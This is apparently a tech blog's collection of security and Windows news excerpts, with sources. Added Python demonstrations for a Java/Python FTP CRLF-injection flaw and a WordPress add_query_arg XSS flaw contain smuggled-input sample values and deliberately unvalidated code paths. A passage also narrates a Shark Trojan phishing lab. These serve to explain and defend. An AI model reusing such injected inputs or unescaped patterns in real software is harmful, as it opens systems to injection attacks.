Time to block Windows Automatic Update — with a new twist for Win10 Pro | Computerworld

If you’ve ever had issues with Windows updates — haven’t we all — this is the article for you. It tells you how to delay the updates until Microsoft gets the bugs out. After all, they’re not paying you to test their software. With their last earnings, they can afford to hire and pay employees to get the brunt of the bugs fixed before forcing a roll-out to its captive users.

Rumors swirling all over the blogosphere have Microsoft re-releasing the ill-fated Win10 version 1809 on Patch Tuesday this month. Personally, given the dearth of worthwhile features in 1809 and the painful first release last month, I’d rather that they just wait a week or a month or six, until it’s fully baked, but that probably won’t happen.

Better still, I wish they’d wait a year or two, roll in some new features worthy of a full reinstall, and then unleash something new and worthwhile. If wishes were horses …

While we wait for Pennywise the September October November 2018 Update clown to appear again, now’s a very good time to make sure your machine won’t install it — or any other poorly tested patches — until the cannon fodder has weighed in.

Read how…

Source: Time to block Windows Automatic Update — with a new twist for Win10 Pro | Computerworld

An Introduction to the Domain Name System (DNS) And How it Works | Elegant Themes Blog

Have you ever wondered what the heck the DNS is and why it’s important? Well, here’s a really good intro for your edification!

Every website has an IP address that identifies it among all others. Theoretically, you could navigate the web using only IP addresses instead of domain names, but this wouldn’t be practical. To understand how IP addresses and domains relate to each other, you need to get to know the Domain Name System (DNS).

The DNS enables us to navigate the web more intuitively. In this article, we’re going to talk more about what the DNS is and how it works. Then, we’ll introduce you to multiple DNS-related terms you should know and talk about why they’re important. Let’s jump right in!

Source: An Introduction to the Domain Name System (DNS) And How it Works | Elegant Themes Blog

Microsoft Will End Final Free Windows 10 Upgrade Program On December 31 – ExtremeTech

If you’ve been procrastinating about taking the plunge to Windows 10, now’s the time to do it…

Should you need a Windows 10 upgrade after the December 31st cutoff, you’ll probably have to pay for it. A license for the Home edition starts at about $75 for a system builder OEM copy that is tied to a specific PC. Retail copies with less restrictive licensing are a bit more expensive, as is the professional version of the operating system.

Source: Microsoft Will End Final Free Windows 10 Upgrade Program On December 31 – ExtremeTech

How to Recover from a Ransomware Attack – AARP

You should have the information you need to prevent (as much as possible) a ransomware attack, but if you are still locked out of your files, here are some tips to help you recover. Remember, prevention is the best solution here, including backups of all your files. I’ve listed the steps, but you’ll need to read the article for the full version.

Ransomware attacks are becoming more frequent, with hackers stealing your most important files. Follow these steps if you are a victim of ransomware.


  • Don’t pay the ransom.
  • Reinstall your files from a backup. 
  • Make sure your operating system and antivirus are up to date.
  • Contact your IT department or antivirus company.

If none of that works, consider the worst “solution”:

  • Accept that your files are lost and gone forever.

Source: How to Recover from a Ransomware Attack – AARP

WikiLeaks Reveals ‘Athena’ CIA Spying Program Targeting All Versions of Windows

More CIA spying tools…

WikiLeaks has published a new batch of the ongoing Vault 7 leak, detailing a spyware framework – which “provides remote beacon and loader capabilities on target computers” – allegedly being used by the CIA that works against every version of Microsoft’s Windows operating systems, from Windows XP to Windows 10.

Dubbed Athena/Hera, the spyware has been designed to take full remote control of infected Windows PCs, allowing the agency to perform all sorts of actions on the target machine, including deleting data, uploading malicious software, and stealing data and sending it to a CIA server.

Read the article and where to find the download & docs on how it works…

Source: WikiLeaks Reveals ‘Athena’ CIA Spying Program Targeting All Versions of Windows

WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom

If you were infected by WannaCry, they have released a decryption tool to unlock your files without paying the ransom.

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

WannaCry Ransomware Decryption Keys

WannaCry’s encryption scheme works by generating a pair of keys on the victim’s computer that rely on prime numbers: a “public” key and a “private” key, used for encrypting and decrypting the system’s files respectively.

Read the entire article here…

Source: WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom

No More Ransom — 15 New Ransomware Decryption Tools Available for Free

If viable, these could be very valuable tools…

Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware.

Started as a joint initiative by Europol, the Dutch National Police, Intel Security and Kaspersky Lab, No More Ransom is an anti-ransomware cross-industry initiative to help ransomware victims recover their data without having to pay ransom to cyber criminals.

The website not only educates computer users on protecting themselves from ransomware, but also provides a collection of free decryption tools.

Source: No More Ransom — 15 New Ransomware Decryption Tools Available for Free

Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection

These newly discovered bugs in Java and Python are a big deal.

The two popular programming languages, Java and Python, contain similar security flaws that can be exploited to send unauthorized emails and bypass any firewall defenses.

And since both the flaws remain unpatched, hackers can take advantage to design potential cyber attack operations against critical networks and infrastructures.

The unpatched flaws actually reside in the way the Java and Python programming languages handle File Transfer Protocol (FTP) links: they don’t syntax-check the username parameter, which leads to what researchers call a protocol injection flaw.
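As an added illustration (not code from the article, nor from either language’s standard library), the Python below shows what the missing syntax check looks like and why an unchecked username matters. The sample URLs are constructed, the helper names are mine, and `build_user_command` with validation switched off only mimics the unpatched behaviour described above.

```python
import re
from urllib.parse import urlsplit, unquote

# CR LF ends an FTP command line, so a control character inside a username turns
# one USER command into two. Rejecting every ASCII control character is the
# syntax check the article says the FTP URL handling was missing.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def ftp_url_is_safe(url: str) -> bool:
    """Return True only for an ftp:// URL whose username/password are clean."""
    # Check the raw string first: current urlsplit() silently strips \r, \n and
    # \t before parsing, which would hide a literal CR LF from the later checks.
    if _CONTROL.search(url):
        return False
    parts = urlsplit(url)
    if parts.scheme.lower() != "ftp":
        return False
    for field in (parts.username, parts.password):
        # urlsplit() leaves userinfo percent-encoded; a client decodes it before
        # sending USER/PASS, so the check has to run on the decoded value.
        if field and _CONTROL.search(unquote(field)):
            return False
    return True


def _naive_username(url: str) -> str:
    """Extract the username the way an unchecking client does: split on the
    delimiters, percent-decode, no stripping, no validation."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    userinfo = authority.rpartition("@")[0]
    return unquote(userinfo.split(":", 1)[0]) if userinfo else "anonymous"


def build_user_command(url: str, validate: bool = True) -> bytes:
    """Return the USER line an FTP client would send for this URL.

    validate=False reproduces the unpatched behaviour: the decoded username is
    pasted into the command line without any syntax check."""
    if validate and not ftp_url_is_safe(url):
        raise ValueError("rejected: control characters in FTP URL userinfo")
    return f"USER {_naive_username(url)}\r\n".encode("utf-8")


def command_count(url: str) -> int:
    """How many protocol lines the unvalidated USER command would carry."""
    return build_user_command(url, validate=False).count(b"\r\n")


def rejects(url: str) -> bool:
    """True if the validating path refuses to build a command for the URL."""
    try:
        build_user_command(url)
    except ValueError:
        return True
    return False


# Constructed sample URLs (not taken from the article). "SMUGGLED" stands in for
# whatever a second protocol line would contain.
CLEAN_URL = "ftp://alice:s3cret@ftp.example.com/reports/q1.csv"
ENCODED_CRLF_URL = "ftp://alice%0D%0ASMUGGLED@ftp.example.com/x"
LITERAL_CRLF_URL = "ftp://alice\r\nSMUGGLED@ftp.example.com/x"

if __name__ == "__main__":
    for label, url in (("clean", CLEAN_URL), ("encoded CRLF", ENCODED_CRLF_URL),
                       ("literal CRLF", LITERAL_CRLF_URL)):
        print(f"{label:13} lines sent unchecked: {command_count(url)}  "
              f"rejected by check: {rejects(url)}")
```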

Read more…

Source: Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection

Beware — Someone is dropping Malware-infected USB Sticks into People’s Letterbox

So you found a USB stick, but wait, wait, wait!!! Do not plug an unknown USB anything into your computer, laptop, phone, whatever! If you’re confused, watch the first season of Mr. Robot. Or, know that hackers put malware on these devices that WILL infect your machine. Be safe.

…unmarked USB flash drives containing harmful malware being dropped inside random people’s letterboxes in the Melbourne suburb of Pakenham.

It seems to be one of the latest tactics of cyber criminals: dropping malware-laden USB sticks into people’s mailboxes in the hope that unsuspecting users will plug the infected devices into their personal or home computers.

Read article…

Source: Beware — Someone is dropping Malware-infected USB Sticks into People’s Letterbox

5 Things to Know Before Starting a Web Project – Build Studio

This is really good information from the web developer’s point of view. We always try to charge appropriately, but some things just take time and resources — like backing up an entire site, creating a test environment so an update doesn’t hose the entire site, working in antiquated software the client insists upon — and there’s not much we can do about it except charge our client or eat the loss. After a bunch of times eating the costs for a number of clients because the actual charge seems awfully high, it’s hard to make a living.

If you’ve never been involved in the creation of a website before, there are some paths that can lead to delays or bloated budgets. We’ve identified what we feel are the biggest pitfalls and how to avoid them. 1. You’re Likely Underestimating How Long Content Will Take In the majority of sites we make, the client…. Continue Reading »

Source: 5 Things to Know Before Starting a Web Project – Build Studio

How does The Internet Work?

So, how does the internet work?

The internet is something nearly everyone uses on a daily basis. We’ve all come to rely on it and some of us make our living using it. So, how does it work? How do computers connect? How do messages pass between computers? Is it really a bunch of tubes? (hint, nope!) Who owns it?

This article explains some of the more general points about an indispensable system.

Nowadays, the internet has become essential, second only to food. There are many people who will not agree with this statement, but once they start using the internet, they will. You are reading this article, so I hope you are already aware of what the internet is. But, really?

You will say “Yes, I know what the internet is,” but is that enough? Don’t you ever wonder how the internet works? Maybe you already know how it works if you are an IT pro or teacher, but I think everyone should know this, because the internet is common and it is for everyone. So the study of the internet should not be only for IT students. So, coming to the point, I wrote this article to make everyone aware of internet concepts and how it works, with the help of the website Howstuffworks.com. I hope you have enough time to read it patiently.

Source: How does The Internet Work?

Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable

A new critical zero-day vulnerability has been discovered in the Linux kernel that could allow attackers to gain root level privileges by running a malicious Android or Linux application on an affected device.

The critical Linux kernel flaw (CVE-2016-0728) has been identified by a group of researchers at a startup named Perception Point.

The vulnerability was present in the code since 2012, and affects any operating system with Linux kernel 3.8 and higher, so there are probably tens of millions of computers, both 32-bit and 64-bit, exposed to this flaw.

However, the most bothersome part is that the problem affects Android versions KitKat and higher, which means about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw.

Impact of the Zero-Day Vulnerability

An attacker would only require local access to exploit the flaw on a Linux server.

If successfully exploited, the vulnerability can allow attackers to get root access to the operating system, enabling them to delete files, view private information, and install malicious apps.

“It’s pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,” Yevgeny Pats, co-founder and CEO at security vendor Perception Point, said in a blog post published today.

“With no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.”

Usually, flaws in the Linux kernel are patched as soon as they are found; this is one reason Linux-based operating systems are considered more secure than others. However, this recently discovered zero-day vulnerability went unnoticed in the Linux kernel for almost 3 years.

Read the rest of the article…

Source: Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable | The Hacker News

Get A Glimpse Of The Cyber Threat Landscape For 2016 And Beyond | Hacked

Here’s a rundown of the cyber threat landscape for 2016 and beyond, courtesy of a report from Intel Security.

Coming In 2016

The 2016 predictions cover threats from ransomware, infrastructure attacks, attacks on automobile systems and the sale and warehousing of stolen data.

• Hardware: Attacks on hardware and firmware will continue while the market for the tools that facilitate them will increase. System firmware toolkits could target virtual machines.

• Ransomware: Ransomware is a growing threat that could anonymize payment methods and networks. More inexperienced cybercriminals will use ransomware-as-a-service.

• Wearables: Most wearable devices store only small amounts of information, but cybercriminals could target them to undermine the smartphones that manage them. The industry will have to protect attack surfaces like networking and wi-fi software, operating system kernels, memory, user interfaces, storage systems and local files, web apps, virtual machines and security and access control software.

• Employee systems: Attackers are likely to target organizations through their employees, including their home security systems, to access corporate networks. Organizations will have to stay vigilant by implementing new security technologies, creating effective policies and hiring experienced people.

• Cloud services: Attackers could exploit vulnerable security policies that protect cloud services. These services could undermine business strategy, financials, portfolio strategies, next-generation innovations, employee data, acquisition and divestiture plans, and other data.

• Automobiles: Connected automobile systems that lack security capabilities will be potential scenarios for exploitation. Automakers and IT vendors will partner to provide standards and solutions to protect attack surfaces like engine and transmission engine control units (ECUs), remote key systems, advanced driver assistance system ECUs, passive keyless entry, USBs, OBD IIs, V2X receiver, smartphone access and remote link type apps.

• Warehouses of stolen data: The dark market for stolen, personally-identifiable information and user names and passwords will increase in 2016. Big data warehouses that link together stolen, personally-identifiable information sets make combined records more valuable to attackers.

• Integrity attacks: Selective compromises to systems and data mark one of the most significant new attack vectors. Such attacks seize and modify transactions or data to favor perpetrators. An attacker can change direct deposit settings for a victim’s paychecks and direct the deposit to a different account. Cyber thieves could steal millions of dollars in an integrity attack in the financial sector in 2016, McAfee Labs predicts.

• Sharing threat intelligence: Enterprises and security vendors will increasingly share intelligence. Legislative action could allow governments and companies to share threat intelligence. Best practices in this area will increase, allowing success metrics to emerge and quantify protection improvement. Threat intelligence cooperatives among vendors will grow.

Source: Get A Glimpse Of The Cyber Threat Landscape For 2016 And Beyond | Hacked

Internet Society Releases Internet of Things (IoT) Overview Whitepaper: Understanding the Issues and Challenges of a More Connected World | Internet Society

As you will see in the document, we believe that security in the Internet of Things is perhaps the most significant challenge, and we believe ensuring security in IoT must be a fundamental priority. Poorly secured IoT devices and services can serve as potential entry points for cyber attack and expose user data to theft by leaving data streams inadequately protected. A proliferation of poorly secured devices also has the potential to impact the security and resilience of the Internet globally. In order for IoT to be successful, users will need to trust that devices and related data services are secure from vulnerabilities, especially as this technology becomes more pervasive and integrated into our daily lives.

Source: Internet Society Releases Internet of Things (IoT) Overview Whitepaper: Understanding the Issues and Challenges of a More Connected World | Internet Society

Dell’s Laptops are Infected with ‘Superfish-Like’ pre-installed Malware

From The Hacker News:

Dell’s Laptops are Infected with ‘Superfish-Like’ pre-installed Malware

Similar to the Superfish malware that surrounded Lenovo laptops in February, another big computer manufacturer, Dell, was spotted selling PCs and laptops pre-installed with a rogue SSL certificate that could allow attackers:
  • To impersonate any HTTPS-protected website and spy on users while they are banking or shopping online.
The rogue certificate, dubbed eDellRoot, was first discovered over the weekend by a software programmer named Joe Nord. The certificate is so creepy that it automatically re-installs itself even when removed from the Windows operating system.

Superfish 2.0: Unkillable Zombie

The self-signed transport layer security (TLS) certificate came pre-installed as a trusted root certificate on Dell PCs and laptops; every affected machine carries the same private cryptographic key, which is stored locally on the device.

Read More…

An interesting article on web apps and ad blockers


And here I thought I was the only one having issues when browsing with ad blockers turned on…

Why “Ad Blockers” Are Also Changing the Game for SaaS and Web Developers

Quantum Defense – The Race to Military Applications of Fundamental Science

The first superpower to harness quantum science will achieve military super-powers, Defense One reports: unbreakable communication security, and quantum supercomputers much more powerful than today’s machines. As usual, the race is between the US and China. Defense Undersecretary Frank Kendall said: “Much like autonomy, quantum sciences is an area that could yield fundamental changes in military capabilities.”

A Billion-Fold Increase in Defense Computing Power

Quantum computers are “as different from regular computers as humans are from jellyfish.” While traditional computers encode information in classical bits that are in well-defined states – on or off, zero or one – quantum computers …

Source: Quantum Defense – The Race to Military Applications of Fundamental Science

WordPress Security Vulnerability

Please update your WordPress version to 4.2.1 and any out-of-date plug-ins installed immediately!

According to Sucuri:

Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins

Multiple WordPress plugins are vulnerable to Cross-site Scripting (XSS) due to the misuse of the add_query_arg() and remove_query_arg() functions. These are popular functions used by developers to modify and add query strings to URLs within WordPress.

The official WordPress documentation (Codex) for these functions was not very clear and misled many plugin developers into using them in an insecure way. The developers assumed that these functions would escape the user input for them, which they do not. This simple detail caused many of the most popular plugins to be vulnerable to XSS.

To date, this is the list of affected plugins:

  • Jetpack
  • WordPress SEO
  • Google Analytics by Yoast
  • All In one SEO
  • Gravity Forms
  • Multiple Plugins from Easy Digital Downloads
  • UpdraftPlus
  • WP-E-Commerce
  • WPTouch
  • Download Monitor
  • Related Posts for WordPress
  • My Calendar
  • P3 Profiler
  • Give
  • Multiple iThemes products including Builder and Exchange
  • Broken-Link-Checker
  • Ninja Forms

There are probably a few more that we have not listed. If you use WordPress, we highly recommend that you go to your wp-admin dashboard and update any out of date plugins now.

This issue was first identified by Joost from Yoast in one of his plugins (he did a great write up about it as well). We worked together with him to investigate the issue and found that it likely affected a lot more plugins than just that one.

Our research team, along with a few friends (especially Joost from Yoast), has been going through the WordPress repository for the last few days in an attempt to find as many affected plugin developers as possible, to warn them and help them patch the issue.

Coordinated Disclosure

This vulnerability was initially discovered last week. Due to the varying degrees of severity and, more importantly, the large volume of plugins affected, we coordinated a joint security release with all developers involved and the WordPress core security team. It was great teamwork, and a pleasant experience to see so many developers united and working together for the common good. We can happily say that all plugins have been patched, and as of this morning updates should be available to all users (yes, everyone pushed their updates in unison 2 hours ago).

If you use WordPress, now it is your turn to update your plugins!

If you have automatic updates enabled, your site should already be patched, especially in the most severe cases.

There are more plugins vulnerable

Our team only analyzed the top 300-400 plugins, far from all of them, as you might imagine. So there are likely a number of plugins still vulnerable. If you’re a developer, check your code to see how you use these two functions:


Make sure you are escaping their output before use. We recommend using the esc_url() (or esc_url_raw()) functions with them. You should not assume that add_query_arg and remove_query_arg will escape user input. The WordPress team is providing more guidelines on how to use them, and we will keep looking for more vulnerable plugins and keep our list here current.
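Added example, not Sucuri’s or WordPress’s own code: a Python model of the add_query_arg() pitfall described above and of the esc_url() fix, written so it runs without WordPress. The request URI is constructed, the helper names are mine, and the two modelled functions reproduce only the behaviour that matters here (add_query_arg() falls back to the current request URI and returns it unescaped; esc_url() drops characters a URL cannot contain and entity-encodes & and ').

```python
import re
from typing import Optional
from urllib.parse import urlsplit, urlunsplit, parse_qsl

# Constructed request URI standing in for $_SERVER['REQUEST_URI'] on a plugin
# settings page. The browser percent-encoded the attacker's value, which decodes
# to:  x = "><b>injected</b>
ATTACKER_REQUEST_URI = "/wp-admin/admin.php?page=demo&x=%22%3E%3Cb%3Einjected%3C/b%3E"

# Character set WordPress's esc_url() allows; anything else is removed.
_NOT_ALLOWED = re.compile(r"[^a-z0-9\-~+_.?#=!&;,/:%@$|*'()\[\]\x80-\xff]",
                          re.IGNORECASE)


def add_query_arg(args: dict, url: Optional[str], request_uri: str) -> str:
    """Model of WordPress add_query_arg(): merge args into the query string of
    `url`, or of the current request URI when no URL is passed. As in WordPress,
    the query is parsed (percent-decoded) and rebuilt WITHOUT any escaping."""
    parts = urlsplit(url if url is not None else request_uri)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query.update({k: str(v) for k, v in args.items()})
    rebuilt = "&".join(f"{k}={v}" for k, v in query.items())
    return urlunsplit(parts._replace(query=rebuilt))


def esc_url(url: str) -> str:
    """Model of the parts of WordPress esc_url() that matter here: strip
    characters a URL cannot contain (this removes ", <, > and whitespace), then
    entity-encode & and ' so the result is safe inside a double-quoted
    HTML attribute."""
    cleaned = _NOT_ALLOWED.sub("", url)
    return cleaned.replace("&", "&#038;").replace("'", "&#039;")


def render_link_vulnerable(request_uri: str) -> str:
    """The pattern the affected plugins used: trust add_query_arg()'s output."""
    href = add_query_arg({"tab": "advanced"}, None, request_uri)
    return f'<a href="{href}">Advanced settings</a>'


def render_link_fixed(request_uri: str) -> str:
    """The patched pattern: escape the URL before it goes into markup."""
    href = esc_url(add_query_arg({"tab": "advanced"}, None, request_uri))
    return f'<a href="{href}">Advanced settings</a>'


def injected_markup_present(markup: str) -> bool:
    """True if the attacker-supplied <b> element survived into the page."""
    return "<b>injected</b>" in markup


if __name__ == "__main__":
    print("vulnerable:", render_link_vulnerable(ATTACKER_REQUEST_URI))
    print("fixed:     ", render_link_fixed(ATTACKER_REQUEST_URI))
```

Note that esc_url() strips the offending characters rather than encoding them, so the link value is altered as well as made safe; esc_url_raw() applies the same stripping without the entity encoding, which is why it is the right choice for redirects and database storage rather than HTML output.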

This is also a good time to remind everyone that all software will have bugs, and some of those bugs will inevitably lead to security vulnerabilities; such is the life we live in. This applies to plugins, themes, web servers, CMSes and basically anything that is written by people and based on code. As much as developers try to minimize them and apply secure coding principles, mistakes will inevitably still happen. We just have to be prepared and find ways to minimize the effect of any vulnerability in your environment; a perfect example of such an approach is what you’re seeing today with this coordinated release.

Here are some tips and tricks to remember to help reduce your overall threat risk, helping to improve your individual security posture:

  1. Patch. Keep your sites updated.
  2. Restrict. Restrictive access control. Restrict your wp-admin directory to only whitelisted IP addresses. Only give admin access to users that really need it. Do not log in as admin unless you are really doing admin work. These are some examples of restrictive access control policies that can minimize the impact of vulnerabilities in your site.
  3. Monitor. Monitor your logs. They may give you clues to what is happening on your site.
  4. Reduce your scope. Only use the plugins (or themes) that your site really needs to function.
  5. Detect. Prevention may fail, so we recommend scanning your site for indicators of compromise or outdated software. Our plugin and SiteCheck can do that for free for you.
  6. Defense in Depth. If you have an Intrusion Prevention System (IPS) or Web Application Firewall (WAF), they can help block most common forms of XSS exploits. You can even try our own CloudProxy to help you with that. If you like the open source route, you can try OSSEC, Snort and ModSecurity to help you achieve that.

These principles are commonly applied to most secure networks (or on any business that needs to be PCI compliant), but not many website owners think of them for their own site / environment.

These are but a few high level recommendations; we recommend going through our blog for more ideas on how to keep your sites safe and ahead of the threats.

By Daniel Cid

Twitter Bootstrap

Bootstrap is a modular framework developed by Mark Otto and Jacob Thornton at Twitter as a framework to encourage consistency across internal tools. Before Bootstrap, various libraries were used for interface development, which led to inconsistencies and a high maintenance burden. According to Twitter developer Mark Otto, in face of those challenges:

“…[A] super small group of developers and I got together to design and build a new internal tool and saw an opportunity to do something more. Through that process, we saw ourselves build something much more substantial than another internal tool. Months later, we ended up with an early version of Bootstrap as a way to document and share common design patterns and assets within the company.”

The first deployment under real conditions happened during Twitter’s first Hackweek. Mark Otto showed some colleagues how to accelerate their projects’ development with the help of the toolkit. As a result, dozens of teams have moved to the framework.

In August 2011 Twitter released Bootstrap as open source. As of February 2012, it is the most popular GitHub development project. Version 3.0 is due out soon and development comments are being taken now. Many CMS developers are creating themes and add-ins for Joomla, WordPress and Drupal, to name a few. The popularity lies in the simplicity of the system once you have absorbed the CSS and JavaScript functionality. While modular, clever use of the grid system can create a non-grid design. Combining it with HTML5 Boilerplate and Initializr (custom HTML5 configurations) gives a fully functional HTML5 framework.

Continue reading

PWN — The New Term In Town

So you may have been seeing this word “pwn” in articles regarding security and hacking and thought it was a typo and it should have read “own.” Well, you’re partly correct. Pwn (pronounced “powned”) “is a leetspeak (elite speak) term meaning to appropriate or to conquer or gain ownership. In hacker-ese, it means to compromise or control, specifically another computer (server or PC), web site, gateway device or application.” See the Wikipedia article.

The term originally dates back to the days of WarCraft, when a map designer misspelled “Own” as “Pwn”. What was originally supposed to be “player has been owned” became “player has been pwned”.
Pwn eventually grew from there and is now used throughout the online world, especially in online games.

1. “I pwn these guys on battlenet”
2. “This strategy pwns!” or “This game pwn.”
  • Perfect ownage.  Flawless victory.  Schooled.  Lesson taught.  Owned beyond conventional words, and so excited about it, it’s mistyped.
  • The word Pwn was originally a typo from when the writer wanted to say Own. Pwn is commonly used in internet games, for example: Counter-Strike. Pwn is used to explain that the player was badly beaten.
  • So, the next time you want to own someone, make sure you pwn them! Make sure your antivirus is up-to-date and that you don’t click links you shouldn’t, or you will be pwned by hackers!

    What is Two-Factor Authentication? Why Should You Care?

    What is two-factor authentication?  According to Wikipedia:

    Two-factor authentication (TFA, T-FA or 2FA) is an approach to authentication which requires the presentation of two or more of the three authentication factors: “something the user knows”, “something the user has”, and “something the user is”.

    There are three generally recognized factors for authentication: something you know (such as a password), something you have (such as a hardware token or cell phone), and something you are (such as your fingerprint). Two-factor authentication requires the system to use two of these.

    Why should you care? Requiring two or more of these factors makes your login considerably more secure: a stolen or guessed password alone is no longer enough to get in.

    For email purposes, Google’s Gmail is currently the only major webmail provider that offers this option, although Microsoft Hotmail’s forum moderators recently thought differently. An interesting article by Fahmida Y. Rashid outlines the questions asked of the support forum regarding Microsoft Hotmail’s authentication, with some surprising responses. It only took 3 weeks for an informed response to be posted.

    So now you know what two-factor authentication is, shock and awe your friends!

    Taken Over

    According to Neil J. Rubenking, taking over your computer remotely appears to be ridiculously easy, as long as you’re a bit gullible and don’t have any antivirus protection. Apparently he’s done it, along with several other tech journalists, as part of a recent McAfee Consumer Journalist Day at McAfee headquarters in Santa Clara.

    Each of the journalists was provided with a laptop already running VMware virtual machines. One VM represented the attacker and the other the victim, with no outside connection for safety’s sake.

    Starting with the installation of Shark Trojan, they got to work.  Shark Trojan bills itself as “an advanced reverse connecting, firewall bypassing remote administration tool,” and warns the user not to use it to do anything illegal.  This, and other similar tools, are available for prices that rarely exceed 2 figures.

    Shark, according to Rubenking,

    “makes hacking so simple it’s ridiculous, especially with the script of instructions supplied by McAfee. With one click I created a server to handle command and control for my attack. Binding my Trojan attack to a legitimate (but outdated) McAfee antivirus tool was equally simple. Had the script called for it, I could have configured the Trojan to lay low if it detected certain tracking tools. Finished with setup, I copied my Trojanized antivirus into the web server’s download folder.

    Viewed in a browser, that server serves up a site that looks exactly like McAfee’s. You have to look closely to notice that the URL says “macfee.com.” I sent an official-looking email to the victim system with a link to my evil creation, then switched to the victim’s virtual machine and launched the link.

    Back on the attacker system, I immediately saw the victim show up in the Shark console. From that console I had virtually total control over the victim. I launched a DOS shell, viewed and changed Registry entries, tweaked files, launched programs, and manipulated services, all with simple commands from the console. I installed a keylogger, typed a little in the victim system, and verified that the keystrokes were captured.

    As a final act of simulated malice, I copied a virus to the victim’s system and launched it. Back on the victim system I ran the Trojanized antivirus, which functioned in detection-only mode. It found hundreds of infected files. That poor victim was completely and totally pwned.”

    While this venture took place on a virtual machine on a virtual network and harmed no one, it was increasingly apparent how easy it would be for any ordinary hacker or wannabe to go after any oblivious person or machine.

    Word to the wise:  be careful what you click AND Get Your Antivirus Running!!!

    Read the entire article here.


    Microsoft Warning: Email Worm Posing as MS Update

    John Lister / InfoPackets on 20110107 @ 12:11AM EST

    Microsoft is today warning users of fake security alerts arriving via email. Microsoft is reminding users that it never sends out security alerts with attachments via email and that you should never open such an email if it arrives in your inbox.

    Microsoft Email Security Updates Are a Scam

    Cyber-criminals have been sending so-called Microsoft updates that are actually viruses.

    This scam in particular takes advantage of Microsoft’s well-established Patch Tuesday schedule for monthly email updates. Potential victims receive an email purporting to be from Microsoft’s Director of Security Assurance, Steve Lipner (who in fact does hold that role).

    Continue reading

    New Microsoft Web Worm Threat

    One of my favorite e-magazines is Windows Secrets (http://windowssecrets.com). This is a free and for-pay newsletter that gets to the bottom of many Windows (and other) issues. Windows Secrets is also the voice of reason when deciding whether to run a Microsoft/Windows security, or other, update. As you know, many updates issued by Microsoft have the Windows community recipients beta testing half-assed solutions to serious issues. Almost always, the intrepid team at Windows Secrets has advised on the side of caution, having readers wait until testing had been done and any issues had surfaced, so we could make informed decisions.

    So, when Brian Livingston of Windows Secrets advises everyone to install the new MS patch without hesitation, you know it’s serious. Brian states that this is the first time in 1-1/2 years that Microsoft has released an emergency fix outside of its monthly “Patch Tuesday” cycle.

    Continue reading

    Fake Windows Update Ignored by Outlook’s Email Defenses

    There’s a fake Microsoft email message with a nasty file attachment wending its way around the internet. It’s supposedly a Windows update .exe sent as an attachment to a Microsoft email.

    Though almost all email programs block .exe attachment files by default, they don’t always send the entire email to the junk mail folder. Still, an executable attachment should tip the junk filter into the suspicious category and, in an abundance of caution, at least land the message in the Junk Folder.

    If you see this email message, DELETE it post haste. Microsoft would NEVER send an .exe or .msi file through the email system. Microsoft delivers updates through the update process on your PC or Mac.

    The current message supposedly comes from “Microsoft Update Center [securityassurance@microsoft.com]” and contains an attachment KB825559.exe – which should NOT be opened under any circumstances.

    The complete message and details can be found on the Office Watch website http://news.office-watch.com/?699.

    Phishing Scam – Intellectual Property Rights Scam

    For those of you who are now the proud owners of your own website domains, a whole new level of spam comes with them. It’s important to be on your guard for seemingly legitimate requests or inquiries that may in fact be phishing scams, especially in a field that is new to you and in a “language” that may be unfamiliar to you.

    A phishing scam is a legitimate-looking request from a company or individual that is not legitimate, requesting personal and financial information from you that will be used in nefarious ways. Many of these scams, in the form of emails, come complete with a legitimate company’s logo, colors and other distinguishing details, but ultimately direct you to a site that is completely unrelated to the legitimate business.

    Continue reading

    Collecting your POP3 and Webmail Accounts into Outlook – Part 2 – How to Set Up POP3

    Make sure you’ve glanced over Part 1 to make sure this process is right for you.

    Setting up your POP3 accounts into Outlook is a fairly simple process. However, in order to do this, you need to have the following information from your POP3 email account provider:

    1. The Incoming Mail Server (POP3);
    2. The Outgoing Mail Server (SMTP);
    3. The Server Port Number (if it requires something other than the default).

    Please note that each email provider can have different and specific information for each of these areas and you may need to visit their site or call them to get this information.

    Collecting your POP3 and Webmail Accounts into Outlook – Part 1 – Introduction and Considerations

    Did you know that you can collect all of your various webmail, html, and POP3 email accounts into Outlook? As of the date of this writing, I have over 40 POP3 accounts and a Hotmail and MSN account feeding into my permanent Outlook account, making it easy for me to save attachments in appropriate client folders on my hard drive, keep my external accounts clean, and facilitate archiving (which will be another important topic for a later post).

    Internet Security for the Non-Geek

    I came across an article I’d put aside regarding internet security. This article was well written and entitled “andparents: What to do when you’ve been compromised.” I’d put it aside basically because it was information I was already aware of. But then I had to walk my daughter through an emergency clean up of her machine because somehow she’d gotten so infected she couldn’t even log onto her school site to do her assignments. The first thing I asked her was what type of anti-virus software she was using and I heard a lengthy silence on her end. She eventually admitted she had none. We tried a few clean up tricks, but her computer was too far gone. I ended up walking her through a restoration, which to you non-techies is a complete reformat of the hard drive and setting it back to the way it was when she bought it.

    Continue reading